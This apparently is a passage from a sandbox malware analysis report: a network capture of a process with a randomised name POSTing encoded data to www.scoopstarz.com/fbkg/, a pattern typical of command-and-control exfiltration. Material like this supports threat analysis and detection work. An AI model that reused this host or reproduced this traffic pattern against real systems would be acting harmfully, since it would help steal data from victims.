                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p2wo1kfnukSbhOHfetmbfhd5ycsYnNIQM%2F%2B%2BVw0jG2tWOOvDipygcFP3Mo9LX6yaD9Yzn1yY6xymxunUiDEorgvTS4brdwZaqoXgGpHVo7UXiEZ2xzmyUpYPaRwCLLlM5uWCFqQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 827a0c912ac74283-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                56192.168.11.2050183104.21.52.18280C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:10.213340044 CET1180OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.scoopstarz.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.scoopstarz.com
                                                                                                                                                                                                Referer: http://www.scoopstarz.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 2f 70 50 31 74 4b 6a 44 7a 78 64 70 65 65 55 75 32 33 42 4a 6c 6d 7a 65 53 51 76 59 49 6f 48 65 50 6a 6c 56 51 6c 49 36 6b 42 2b 51 64 4d 6f 61 5a 58 7a 56 4f 36 6a 74 6b 75 47 6a 34 6c 66 4e 4d 33 64 2b 75 35 6b 6a 4d 70 68 4a 46 57 4d 4f 30 30 36 2b 34 73 39 42 53 67 72 43 34 34 49 51 33 34 32 46 61 31 74 2f 6b 70 30 66 66 37 35 41 37 76 6b 42 31 73 2f 56 61 4a 31 76 49 68 70 56 61 52 77 4c 39 69 76 65 68 51 31 62 57 37 38 46 31 6a 4d 6c 4d 69 36 48 32 44 59 4d 55 65 50 2b 32 54 36 39 47 53 5a 69 37 67 49 75 45 4c 34 66 4c 53 57 4b 75 65 51 55 7a 4b 65 4a 41 51 66 37 58 78 52 56 51 51 77 43 4e 6c 61 68 48 39 36 6d 65 67 30 6b 6a 79 43 57 48 64 76 76 6e 62 67 66 4e 74 38 64 67 54 4e 49 70 75 64 63 4a 50 67 36 64 37 58 30 52 55 73 78 56 46 6c 38 36 33 70 79 49 59 62 7a 4a 74 79 76 7a 55 4f 4c 67 2f 4b 6f 68 66 6f 51 6a 38 5a 33 4c 72 78 34 59 4f 43 32 72 39 74 73 2b 4f 45 46 4d 48 6d 6e 42 67 4a 4d 37 51 2f 64 64 2f 77 50 65 51 6c 32 64 69 37 58 79 55 57 6c 52 71 62 39 7a 68 31 2b 38 6e 58 6f 30 38 4b 30 36 34 77 2f 54 6f 2f 6d 46 4c 37 6c 35 58 41 42 52 53 37 63 57 4f 51 52 43 72 36 54 43 56 58 76 52 6f 70 70 73 35 53 57 79 4d 4d 44 36 41 48 6f 6c 6b 47 54 4f 68 32 31 54 72 6c 38 6f 47 58 67 76 43 35 6a 6f 4b 42 50 4e 4a 6b 47 4e 54 30 57 79 36 35 58 63 69 77 78 70 46 38 6e 43 77 38 78 7a 69 57 6e 76 4e 6d 4f 43 54 7a 47 57 52 63 77 6d 65 63 49 52 43 37 4c 4c 6f 71 4a 59 72 47 78 61 32 61 54 44 50 35 4f 41 4b 33 64 50 44 5a 66 34 74 66 75 50 61 69 56 41 6b 6e 52 51 77 62 66 7a 56 39 4b 78 6d 61 4f 77 31 48 43 76 49 49 59 67 63 3d
                                                                                                                                                                                                Data Ascii: T6I=k/pP1tKjDzxdpeeUu23BJlmzeSQvYIoHePjlVQlI6kB+QdMoaZXzVO6jtkuGj4lfNM3d+u5kjMphJFWMO006+4s9BSgrC44IQ342Fa1t/kp0ff75A7vkB1s/VaJ1vIhpVaRwL9ivehQ1bW78F1jMlMi6H2DYMUeP+2T69GSZi7gIuEL4fLSWKueQUzKeJAQf7XxRVQQwCNlahH96meg0kjyCWHdvvnbgfNt8dgTNIpudcJPg6d7X0RUsxVFl863pyIYbzJtyvzUOLg/KohfoQj8Z3Lrx4YOC2r9ts+OEFMHmnBgJM7Q/dd/wPeQl2di7XyUWlRqb9zh1+8nXo08K064w/To/mFL7l5XABRS7cWOQRCr6TCVXvRopps5SWyMMD6AHolkGTOh21Trl8oGXgvC5joKBPNJkGNT0Wy65XciwxpF8nCw8xziWnvNmOCTzGWRcwmecIRC7LLoqJYrGxa2aTDP5OAK3dPDZf4tfuPaiVAknRQwbfzV9KxmaOw1HCvIIYgc=
                                                                                                                                                                                                Nov 17, 2023 19:31:10.471175909 CET1181INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:10 GMT
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p2wo1kfnukSbhOHfetmbfhd5ycsYnNIQM%2F%2B%2BVw0jG2tWOOvDipygcFP3Mo9LX6yaD9Yzn1yY6xymxunUiDEorgvTS4brdwZaqoXgGpHVo7UXiEZ2xzmyUpYPaRwCLLlM5uWCFqQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 827a0c912ac74283-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                57192.168.11.2050184104.21.52.18280C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:12.838767052 CET1194OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.scoopstarz.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.scoopstarz.com
                                                                                                                                                                                                Referer: http://www.scoopstarz.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 2f 70 50 31 74 4b 6a 44 7a 78 64 70 65 65 55 75 32 33 42 4a 6c 6d 7a 65 53 51 76 59 49 6f 48 65 50 6a 6c 56 51 6c 49 36 6b 4a 2b 52 76 30 6f 61 37 2f 7a 53 4f 36 6a 6a 45 75 46 6a 34 6c 4f 4e 4d 2f 52 2b 75 31 30 6a 50 52 68 51 7a 47 4d 4f 47 63 36 37 34 73 34 50 79 67 6c 4a 59 34 63 51 33 30 63 46 65 6b 57 2f 30 4e 30 4f 70 4c 35 4c 6f 33 6c 63 56 73 44 56 61 4a 68 72 49 67 55 56 63 4e 67 4c 38 65 76 65 6b 51 31 55 46 44 38 45 6d 37 4d 6d 73 69 35 53 47 44 58 62 45 65 71 2b 32 57 4a 39 47 54 75 69 36 6b 49 75 44 2f 34 65 4d 75 5a 4c 4f 65 51 50 7a 4b 5a 65 51 63 62 37 58 63 57 56 54 4d 77 43 4e 64 61 69 6e 39 36 6a 2f 67 33 30 7a 79 45 48 58 63 33 72 6e 6e 6f 66 4e 34 46 64 6b 44 4e 50 61 53 64 64 36 4c 67 2f 34 58 58 2b 52 55 75 39 46 46 32 33 61 32 32 79 49 4a 77 7a 49 4e 4d 76 78 59 4f 4c 42 66 4b 75 46 4c 33 57 44 38 62 37 72 71 37 79 35 7a 57 32 72 4e 68 73 2b 4f 55 46 4f 33 6d 6b 78 51 4a 4e 36 51 2b 65 4e 2f 33 61 4f 51 4b 2f 39 6d 74 58 78 67 6b 6c 52 6a 65 39 79 6c 31 38 63 6e 58 34 6e 45 46 2b 4b 34 33 67 44 70 6a 69 46 4c 6f 6c 34 71 70 42 55 72 4f 63 6e 69 51 51 79 37 36 58 53 56 51 2f 68 6f 74 2b 38 35 63 46 69 4d 4d 44 36 4d 54 6f 6c 6f 47 51 2b 70 32 30 6a 62 6c 33 61 75 58 74 50 44 79 6a 6f 4b 63 50 4e 4d 55 47 4e 62 61 57 78 7a 55 58 65 4f 77 78 63 68 38 6b 44 77 7a 68 7a 6a 63 6a 76 4d 77 54 79 4f 78 47 57 4e 75 77 6d 4f 69 49 69 47 37 4b 4c 59 71 4c 6f 72 48 68 4b 32 64 55 44 50 76 59 41 32 56 64 50 66 4a 66 34 5a 50 75 4f 2b 69 58 30 31 74 49 53 77 43 4a 68 31 53 4a 31 69 46 4f 44 78 7a 64 66 6b 57 62 32 63 4a 58 30 39 42 6d 51 79 72 46 36 59 70 43 45 38 6d 6c 37 5a 32 76 66 63 50 56 31 39 49 64 64 45 66 58 2b 62 5a 32 71 70 52 69 5a 62 74 45 6f 49 6b 6d 6a 35 72 50 4d 54 72 5a 2f 38 70 4d 71 65 2b 64 79 62 52 46 59 43 69 30 79 4c 50 41 55 57 64 6d 5a 33 42 70 78 61 51 46 47 69 47 6a 66 70 50 4d 56 62 2b 5a 79 48 53 61 31 69 43 44 6d 45 6f 4e 41 63 58 6b 49 4a 69 2f 65 65 61 49 49 44 52 6c 52 2f 34 47 66 6c 72 6d 2b 2f 33 4b 48 6f 67 2b 71 43 74 41 74 71 6f 68 66 44 30 41 79 6d 50 52 4d 54 30 64 53 52 36 53 57 44 34 67 71 79 74 49 44 36 6a 65 4f 4e 64 4a 68 2f 65 2b 6e 32 70 71 48 79 45 6c 63 37 45 78 6a 38 33 72 46 57 37 68 71 6e 72 39 2f 51 4d 63 63 4e 4d 4d 48 74 57 7a 2f 4a 66 48 36 44 43 4d 32 6c 78 6f 35 6b 6b 63 32 4d 69 48 4c 33 6e 51 31 4b 31 66 72 76 32 32 33 56 56 34 7a 56 54 32 62 74 59 2f 34 61 64 6c 54 4c 2b 79 4c 39 49 50 4c 56 78 66 6f 76 63 39 6f 51 6a 6f 6d 6a 41 35 61 33 54 6c 34 4e 41 42 32 6c 7a 79 78 6a 65 36 2f 77 73 59 68 6a 41 32 6b 55 69 4c 32 76 59 5a 76 6a 58 61 55 6a 41 6f 30 79 7a 4c 73 6b 30 4b 34 38 47 7a 5a 5a 48 4a 31 50 74 78 39 59 54 7a 6d 44 38 74 4b 6d 58 63 46 2b 63 6d 71 4d 57 2b 6e 63 6d 2b 58 44 4d 35 6b 63 45 53 70 56 5a 4d 72 37 6e 4e 79 4a 41 35 62 47 69 4d 4d 39 67 57 6b 4d 78 66 73 39 6d 4b 31 56 43 61 7a 43 74 57 4e 42 73 38 2f 4a 75 72 78 56 50 4c 57 4a 6f 45 38 32 58 54 65 4f 73 4f 51 42 4e 6e 53 6b 2f 42 73 4c 4d 4e 70 55 70 43 6c 4b 73 4d 32 41 71 71 63 33 72 79 33 67 59 4a 6b 4c 58 71 6b 62 55 70 65 63 54 54 63 75 43 71 54 37 38 6d 6b 6d 33 74 63 76 34 49 68 50 30 55 4a 7a 4a 42 6d 62 65 62 66 59 72 34 66 4a 43 33 78 54 76 4d 6c 44 73 65 61 41 56 33 42 61 69 67 63 61 74 50 6d 44 66 35 47 62 2f 6f 43 46 53 34 78 2b 41 49 68 45 4e 78 50 31 4a 69 45 55 62 4b 4e 56 42 51 6f 5a 42 37 4e 47 70 51 36 55 68 64 6b 76 4c 43 5a 44 79 49 6e 6f 39 31 75 6c 75 71 78 4c 55 75 4d 4a 50 64 4f 68 67 7a 5a 33 59 69 77 6f 71 72 62 30 54 6a 4d 6f 6b 6b 6e 62 59 42 44 6a 76 2b 32 46 41 62 57 45 54 5a 77 75 33 7a 5a 48 49 59 33 44 71 78 55 36 65 43 4e 31 45 43 73 75 5a 2b 4f 48 77 4d 59 53 2f 34 44 4c 4e 39 41 43 35 4e 45 2b 55 68 72 62 63 68 72 37 44 37 49 68 71 71 2f 63 6e 42 46 77 42 4a 43 59 5a 2f 42 69 58 42 37 6d 7a 2f 46 33 76 73 76 56 4e 43 45 6e 47 4d 4e 34 5a 57 76 47 68 35 45 51 4b 79 6a 39 37 65 39 39 41 50 54 65 4e 6d 76 69 37 75 38 48 53 71 66 4a 5a 47 64 37 4f 4a 57 48 2f 6e 4c 33 2f 32 2b 72 2b 55 4f 55 61 50 4f 41 56 51 50 55 7a 31 79 77 78 53 7a 69 4c 68 35 47 61 4e 47 37 72 37 46 4e 65 34 36 33 74 6a 78 49 77 31 58 69 7a 58 75 35
                                                                                                                                                                                                Data Ascii: T6I=k/pP1tKjDzxdpeeUu23BJlmzeSQvYIoHePjlVQlI6kJ+Rv0oa7/zSO6jjEuFj4lONM/R+u10jPRhQzGMOGc674s4PyglJY4cQ30cFekW/0N0OpL5Lo3lcVsDVaJhrIgUVcNgL8evekQ1UFD8Em7Mmsi5SGDXbEeq+2WJ9GTui6kIuD/4eMuZLOeQPzKZeQcb7XcWVTMwCNdain96j/g30zyEHXc3rnnofN4FdkDNPaSdd6Lg/4XX+RUu9FF23a22yIJwzINMvxYOLBfKuFL3WD8b7rq7y5zW2rNhs+OUFO3mkxQJN6Q+eN/3aOQK/9mtXxgklRje9yl18cnX4nEF+K43gDpjiFLol4qpBUrOcniQQy76XSVQ/hot+85cFiMMD6MToloGQ+p20jbl3auXtPDyjoKcPNMUGNbaWxzUXeOwxch8kDwzhzjcjvMwTyOxGWNuwmOiIiG7KLYqLorHhK2dUDPvYA2VdPfJf4ZPuO+iX01tISwCJh1SJ1iFODxzdfkWb2cJX09BmQyrF6YpCE8ml7Z2vfcPV19IddEfX+bZ2qpRiZbtEoIkmj5rPMTrZ/8pMqe+dybRFYCi0yLPAUWdmZ3BpxaQFGiGjfpPMVb+ZyHSa1iCDmEoNAcXkIJi/eeaIIDRlR/4Gflrm+/3KHog+qCtAtqohfD0AymPRMT0dSR6SWD4gqytID6jeONdJh/e+n2pqHyElc7Exj83rFW7hqnr9/QMccNMMHtWz/JfH6DCM2lxo5kkc2MiHL3nQ1K1frv223VV4zVT2btY/4adlTL+yL9IPLVxfovc9oQjomjA5a3Tl4NAB2lzyxje6/wsYhjA2kUiL2vYZvjXaUjAo0yzLsk0K48GzZZHJ1Ptx9YTzmD8tKmXcF+cmqMW+ncm+XDM5kcESpVZMr7nNyJA5bGiMM9gWkMxfs9mK1VCazCtWNBs8/JurxVPLWJoE82XTeOsOQBNnSk/BsLMNpUpClKsM2Aqqc3ry3gYJkLXqkbUpecTTcuCqT78mkm3tcv4IhP0UJzJBmbebfYr4fJC3xTvMlDseaAV3BaigcatPmDf5Gb/oCFS4x+AIhENxP1JiEUbKNVBQoZB7NGpQ6UhdkvLCZDyIno91uluqxLUuMJPdOhgzZ3Yiwoqrb0TjMokknbYBDjv+2FAbWETZwu3zZHIY3DqxU6eCN1ECsuZ+OHwMYS/4DLN9AC5NE+Uhrbchr7D7Ihqq/cnBFwBJCYZ/BiXB7mz/F3vsvVNCEnGMN4ZWvGh5EQKyj97e99APTeNmvi7u8HSqfJZGd7OJWH/nL3/2+r+UOUaPOAVQPUz1ywxSziLh5GaNG7r7FNe463tjxIw1XizXu52K3nEB1Hqrk+Y0q6DN/e6lKlDDFnLJ3wN7IsfGOxRWdJPhI/u/B3XH/NGgkNUYNAPUVw0nE6oGJy6D4F3SEUXr173qSK3ByjpxE5KdgHu+72OlZ0ffHV6rCUJjYvCYwf5sFp6Tc3V26uX8o665hWAzeDPfQ379Wce5huDNnFiKCISA7MaWepEWHFDVBGnDs+Xxwn/AmQmB1KTh65PupJEQWpEd6O92Sn+jkjLtW9Lxw986/gRJVOOb1t/IWS8kbeS4eodbRHyRYQRDeZrRQT/HY51SrBu3ymVKY9BjOrA0pPry99UXHjdiTrBJC2qgQfXtIrnRPsg2ZE2uhELuo8qC/wlJsB/2prGE6EH30wM2SUKxBXtWmqKgAhmQtQabWabjX0ns7nZ3TUgW2Va33zAGrJw8I+9GtBdWUWfVtrdykOcUlNuhYXRExwgksUSFmu67WECQR413IrOzE+h/4RraWeQOYen00WI8PDwtgw58LT/0DJPYiXzrSasklvQvzBkAGiFtjlCUQSROhQeAYKHMgR/B/rNkpIPstXmnYm2bfYNS1+5ZRzzsWTYNWlRiSpxdQyYDnjn+31aXoZxDmubH8L6DXZzviIK3B+UVsSv6w+b0xLR7EHwlmxdMQKkYsUeSmx3WHl+5vvtUe/ZRNqT9p72DhVGsikbfl7SzZvcqIeA/Uuj73imosb/Obi0OlkIc2jvesRVDB06NtvwKmQtaHztlKcZhRtFZG9+UzdDOWBSVufXO719RVmayr5jZfEGWvJeARei8FqN5KMAz/d2XIsk+3a4yUzWFRgT/FzcBe0UCtMTEDfjdqTRmnBeZAa5/AvaXVR6E1BYdB7s27oh6cRXZuTw0/NYmiVsz+inlGnks6SzDkT/GrtVP4xo0WSAOIhdA4cAAuqE6lBwvXiQ3Ytio8qoM974kkYNPvkFc/in46ccyLLL0yF1M1eQXQFt5FPdQn14VA9HQlaRDRcjFZWpwb1fs2PVNMi/nCtk6WSF38bv8+3OeD5Vk/JsMEqDVmI6hEo5XUTEt3WziyLM9EpI7iFtTvMHV/Qr/jKUfIyASACi8rOzzw/VO8rjW3u5r5cJN8hqsGleRsugzGGycjfoTuJaCSxRUkkH01uNDn1xnq2COriJWXNSL4rDCmyOIkDftw7Y1ilW+0pYPueoUiW8iwg8aPInAO5NY2HwKPowkZ+RyjdS+lJEUqEtBtGnqUvzIJGb5rr+u5TRv5+eRMDgJby9NJkkDTD9Gf7mlCEWxSIRN1SVWHAqry4xh4acj0NhBRj4MrqsUQ1uDDJASRY4tiTfHVxNU+kQZ/U/pHuELYn2r9DY1zqhmvi/8FeAt54YYT3Z99AW6DKMuYBe7Aup50H9/OSbpcv7lMXujycAgqfA1HULDxvWTvxioRZIFIJdRl086TnWwglDIkXiWMcmp4gPPYuUkeOCXAuUFCpwd/k6/UEDioq0rv9ZU672ms9Tby3TEK+QbIrGZXo1R5tazPhJqaHCwWGX0MLCDp/rb2xNKCII65yOx2RdRbzHJZv92pMswhOP1dP+/nZIVXuFM9tTYiFt0gVLRAVeeo2PIyxKnYoUNVrznOR2y6oOp59wX6GuZJgb94gbtUVMfBolzgeFzUAjWbd1CGbsxrp/ucaqc9Z5LmH5hGaQkOHiszHCDE3FIugY7iGN7j3DgrmXXUpN511+5cpDQPKwrSUmmwWGDZyWqqOnLxmfgc9gTmAoTJE1tktRmKtagvK3e1zjWQt1ZJR0xuwVhdo0ysnsKj/1dzTD2nKxs9P0WHK4Yasm425imL2X6PrZrHwmqEwqN7x/dqujop9DV5o9+LQodJUvZzSNUW+Z5nTVvjhZjcPIP0uHY6ddEA/vx8+pkjIB/f3rHWVy1HhZVpe9XW81E+dVXAAXXjN23RMHm+Ew+T5zdvIWZVO6hefn6HXTFhlVlxl7Y4qRCjhvsmLAGCO1++Z2ilDI1qyKQ/Xf/0uA5oh2SkjBe+nIABViYxRmKoQG79CA3K7xKBXLsCNtJyORPa4iuMP/WuHM5M49hf8V3Zw0rgK7LJMBIjWNvX/6xHfIkzlXXtkTQZTCh2zjGHsD79yewsKN2LAvsq3K34N4kv+AdBqp8y6ZZKTokFL6f236brPjo5cEW03VYdonTjPd4uKv6vroH9qIkOh0oCYFURVlil6G90gk8YJW3TAGpSkhcos4mj7o2/WS5tW3cc+5/lIeujxhZDVOwvmSqx4E9az7KvSiYOrGbeTmDy/Vl1VIiVdLKOLtdmlMSyhWkuJebnkdH7gJC5S5f3otmv4xVZykwBauBUugKcwseUhDqew0/Zcdbadc85R8AJ0/qrYalTsWZtwrhy675SvdHY5NWRG4yg6cetKiUswfbyXOOrFsjyPedZyMFvKRMcflILjNYfPHGyOTS1/QPYgxYC7Bp/8dtcF4+n50F70YIGNTmO2q4+VuzWMAywDuyrFb1CjFukGc1qcI6FZvZJ3Epl8SBXTf60cx13d5fcE2LSefyKkmpH4dOosK7WMxT3Mby0HQzGpeCebqEXDThOV8XTWKaaCv63StX9JC9k3dkV9Br6RB6vV77eD8vsJXB42AfGrOmG+IvdsZCZJ/zPIyXXUgPLkWrlmFEEKvn4fNwf5JkLFLlTwF1k6IYf+yVyJp+rIJsnk/ujxo4HNz9wyGXElbhshrXwTZU6BEdFh+T1HFyUD9MLZlFL4ApE
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939686060 CET1200OUTData Raw: 78 36 43 2b 2b 4a 74 2b 55 57 34 75 78 6c 72 72 4d 4c 51 39 74 51 4f 45 51 5a 6d 7a 68 6d 6c 75 52 44 42 4b 51 42 76 69 4e 47 57 6a 43 48 59 4f 4c 71 47 6f 49 38 68 32 4d 53 6d 6f 59 65 50 79 4c 57 6d 44 53 79 75 5a 37 4f 6c 42 78 33 46 6d 44 51
                                                                                                                                                                                                Data Ascii: x6C++Jt+UW4uxlrrMLQ9tQOEQZmzhmluRDBKQBviNGWjCHYOLqGoI8h2MSmoYePyLWmDSyuZ7OlBx3FmDQdtTxIg0zNk5yNJ23rOpIEJwSwG6zrrzkcLc38/fwPPbQ7xe9yM6HpE3KpKhSAc6vSQa9b+PUL+7qwHh12GoGqXfnpSkWRg4TSJdQVWBtT6d/p2j5zh6DLkqUrrDjHbFTpmj7coid5O6w0aVKdYlLpldF0mUfsIa70
                                                                                                                                                                                                Nov 17, 2023 19:31:12.939795971 CET1207OUTData Raw: 78 6c 70 67 57 49 36 4e 69 6b 38 6d 36 4b 77 6b 46 76 63 76 53 36 65 50 4c 32 4c 59 42 72 51 30 70 4a 73 70 52 41 48 64 32 35 4f 47 39 4c 76 4b 65 76 31 48 58 6e 72 55 6b 2b 67 6a 4c 4c 58 79 42 61 65 41 2b 59 4c 79 71 32 67 6c 7a 65 67 4e 46 71
                                                                                                                                                                                                Data Ascii: xlpgWI6Nik8m6KwkFvcvS6ePL2LYBrQ0pJspRAHd25OG9LvKev1HXnrUk+gjLLXyBaeA+YLyq2glzegNFqEwDr3HpapCKBFyh0r4cIWPNbVCKxjF/1wZocxRKvHWSPdLcB1mxWZcCDPGtL0xGX/fsZDbtnQea+yY+LWiHzPAZWYO2TpqzKP+W4ddsTzw7v1006bkwd5JBOke+zaLlJruXqyFiiIBgkTREVqjUv9NwlupNLJBA1R
                                                                                                                                                                                                Nov 17, 2023 19:31:12.940035105 CET1214OUTData Raw: 69 59 38 61 4a 35 79 57 4c 62 4c 31 43 51 51 2b 64 32 58 31 72 68 4a 6f 63 6b 56 75 42 2b 43 4b 75 48 77 64 62 54 34 46 45 4e 52 53 37 5a 54 72 38 55 4a 64 6c 49 6c 6a 35 72 70 30 78 44 4e 54 72 75 6c 70 52 4a 57 4b 65 76 63 5a 35 43 6f 33 78 48
                                                                                                                                                                                                Data Ascii: iY8aJ5yWLbL1CQQ+d2X1rhJockVuB+CKuHwdbT4FENRS7ZTr8UJdlIlj5rp0xDNTrulpRJWKevcZ5Co3xHUtegCEEzURNveVkuTjeoGig16uBkLyNAHz8J1KslLU93FTJ6OGgni0dEnWVbDkQGrZm+vi7IVAgmQ+gAAgwhfHjsCdcGZg0kgRKdHcU4yJmOX8tmzdOyC0WVN3HTboa0dVl1ZGginwv8JsOJ0+nVOMg+dKEPcJgEl
                                                                                                                                                                                                Nov 17, 2023 19:31:12.940360069 CET1217OUTData Raw: 4a 30 4f 5a 49 53 72 42 66 58 6c 4f 44 4e 31 65 77 52 61 33 61 73 33 44 57 57 75 4e 46 4c 4a 58 78 78 38 4e 5a 51 69 66 4f 5a 2b 49 61 65 7a 44 4a 54 37 39 32 6f 65 33 69 68 2f 5a 42 45 49 59 58 54 41 79 6d 6f 4e 4d 4a 51 6f 37 37 45 4d 62 54 54
                                                                                                                                                                                                Data Ascii: J0OZISrBfXlODN1ewRa3as3DWWuNFLJXxx8NZQifOZ+IaezDJT792oe3ih/ZBEIYXTAymoNMJQo77EMbTT8e5mq+sP4dNCsos9KAkTUiNxp2BaNA3N/UKwHEj6flEX7HVj/rd/Iu13hnvsYeP7ozUpe1Vk1TbqOVU+qL2pvm9E2uwQEBK1609Obdp7r9QUrcS+GA4Zcc1OUpBHMlZn7xrgr4v4F4aNojlA6YXqU1v6OChJ+gcJp
                                                                                                                                                                                                Nov 17, 2023 19:31:12.940700054 CET1219OUTData Raw: 6f 6e 38 6a 59 6f 36 6e 47 52 4d 58 38 7a 4c 33 4f 38 6a 2b 61 66 43 2b 6c 6d 4d 42 50 30 59 62 51 6a 62 75 46 4b 42 63 55 73 55 4f 75 55 77 70 6c 6e 52 77 47 58 33 4a 4b 39 58 58 46 43 43 67 74 72 39 36 78 58 45 56 47 43 6e 6e 5a 59 37 59 59 58
                                                                                                                                                                                                Data Ascii: on8jYo6nGRMX8zL3O8j+afC+lmMBP0YbQjbuFKBcUsUOuUwplnRwGX3JK9XXFCCgtr96xXEVGCnnZY7YYXlSFi289M7eufNDy74e1/Q5UO34N7Z2AkbzmRVXyOglxWghFUkdUi5TT8QlfwkRvqLRs7oXt7p56d+GMntB7jbZ/XSrzRw9AoVds3qg7t+iEp2lOFMYL9i/k4g3iNLKiorIFXxBfLmq7RMmFpYMC6qYzUz8y2U8jDh
                                                                                                                                                                                                Nov 17, 2023 19:31:13.038619041 CET1222OUTData Raw: 59 66 76 53 71 5a 76 73 33 63 57 69 44 64 37 33 33 41 75 67 56 56 4c 6b 4d 5a 73 44 68 51 70 4a 4d 6f 54 58 77 30 67 51 45 2b 76 71 55 56 55 66 47 52 57 4f 4b 72 58 4a 69 78 4b 7a 6f 45 73 78 41 78 57 39 75 44 43 48 41 54 55 51 46 6b 30 73 42 31
                                                                                                                                                                                                Data Ascii: YfvSqZvs3cWiDd733AugVVLkMZsDhQpJMoTXw0gQE+vqUVUfGRWOKrXJixKzoEsxAxW9uDCHATUQFk0sB1oW6tW78xmDFZXaqt+DkccF2nOphzJxGmTIOX5cYLXkgQ/2j08AJ83tQmBXr7KdBF+/vc+lRBq+NhwPmqvvYjbSXRrPuRzCPsvRxenm14+rZqvv6Fn/tjOjeakYafbBKdb0JAgXq54T+s9Sh5Wihu7H02EPLKiPs/T
                                                                                                                                                                                                Nov 17, 2023 19:31:13.038733006 CET1225OUTData Raw: 4c 6f 47 79 38 75 6b 6a 74 75 71 66 59 35 57 50 42 4a 30 4c 50 35 35 30 4b 65 4b 4b 4e 37 4e 79 2f 32 30 73 74 70 30 75 6f 66 6b 6a 4f 6c 64 6f 48 55 46 57 46 47 6c 58 47 74 47 71 6d 71 61 51 63 65 6b 44 50 72 42 4c 69 62 34 34 4f 50 62 71 4d 37
                                                                                                                                                                                                Data Ascii: LoGy8ukjtuqfY5WPBJ0LP550KeKKN7Ny/20stp0uofkjOldoHUFWFGlXGtGqmqaQcekDPrBLib44OPbqM76oNh7EGBIC793HOfAp64dyqK6nmNnQAeQiA0Qe3niztf48D8gWGaYwtxRCnxc1Kb5/YdWEPKdJvV/JxtnbKR47PE3p+K8TCyQqEvvwuHMkQfyjljzTm1C78Tuy/kCfNeAlqMdC8omUuLfKtcxdp+nd/3xWGyt2EfZ
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039459944 CET1227OUTData Raw: 67 61 36 61 78 6d 53 51 43 66 53 6f 2f 33 2b 48 2b 78 6f 78 39 71 34 57 58 51 78 68 56 43 42 6b 46 61 2f 41 53 55 37 58 4b 2b 6a 63 48 70 7a 78 61 48 63 72 57 78 51 53 54 2f 36 65 70 4f 4a 33 4e 34 37 46 64 4c 4b 33 31 52 58 57 49 35 2b 63 38 44
                                                                                                                                                                                                Data Ascii: ga6axmSQCfSo/3+H+xox9q4WXQxhVCBkFa/ASU7XK+jcHpzxaHcrWxQST/6epOJ3N47FdLK31RXWI5+c8DDnMy0uyAvZmpq5uU3oj21lzIFX0R0DxoITBDu5TUEKaTwo7A/m792v7Z/N1WMrqOQEMUExdb2UW53LcQ4EopVb63tqV7UCt+3/qkad366Je9VGgn/rdvWqKIPt85mUO0d//RDP63oaeN0HH/XtY4jnSq4aexy7BSD
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039572954 CET1230OUTData Raw: 6b 71 38 4d 31 43 4b 4d 54 65 75 41 50 71 57 70 6a 61 6f 6c 33 35 51 53 30 43 63 6b 65 4c 61 6d 75 62 43 73 4a 6f 32 58 51 37 6a 72 4e 71 44 48 61 6c 37 51 50 44 2b 30 69 61 5a 76 39 44 35 79 66 48 49 61 38 69 63 42 4e 41 71 38 30 34 76 50 72 56
